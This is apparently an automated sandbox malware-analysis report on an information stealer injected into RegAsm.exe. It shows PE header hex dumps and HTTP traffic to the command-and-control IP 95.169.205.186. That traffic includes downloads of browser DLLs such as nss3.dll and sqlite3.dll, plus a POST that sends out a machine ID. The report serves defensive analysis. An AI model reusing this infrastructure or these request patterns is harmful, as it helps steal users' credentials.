22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:22:02 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Sat, 06 Jul 2024 02:52:02 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:22:02 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Sat, 06 Jul 2024 02:52:02 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 Data
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.169.205.186
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B3DA LocalAlloc,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,lstrlenW,lstrlenW,StrToIntW,LocalFree,LocalAlloc,LocalAlloc,LocalFree,WideCharToMultiByte,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,CreateFileMappingW,GetLastError,CloseHandle,GetLastError,GetLastError,CreateMutexA,ReleaseMutex,RegOpenKeyExA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateSemaphoreA,lstrlenA,lstrcpyn,LocalFree,LocalFree,GetFileSize,LocalAlloc,LocalAlloc,lstrlenA,lstrcpyn,ReadFile,ReadFile,CloseHandle,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrlenA,lstrcpyn,lstrcpyn,lstrlenA,LocalFree,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CreateSemaphoreA,ReleaseSemaphore,GetLastError,GetLastError,CreateSemaphoreA,GetLastError,ReleaseSemaphore,SetEnvironmentVariableA,lstrlenA,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlenA,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,LocalFree,2_2_0040B3DA
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: MrBidenNeverKnowHost: 95.169.205.186Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: MrBidenNeverKnowHost: 95.169.205.186Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 32 33 62 37 64 65 35 31 62 62 34 32 61 35 36 39 37 33 33 66 31 65 32 36 64 62 63 65 36 33 62 61 Data Ascii: machineId=9e146be9-c76a-4720-bcdb-53011b87bd06|user&configId=23b7de51bb42a569733f1e26dbce63ba
                    Source: RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/(
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416%
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e4166
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416N
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416P
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416oaming
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dllP
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll2
                    Source: RegAsm.exe, 00000002.00000002.2889674185.000000000124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.169.205.186:80/
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: sqlite3.dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                    Source: 60lAWJYfsL.exeString found in binary or memory: https://aka.ms/nativeaot-c
                    Source: 60lAWJYfsL.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilit
                    Source: 60lAWJYfsL.exe, 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityHh
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
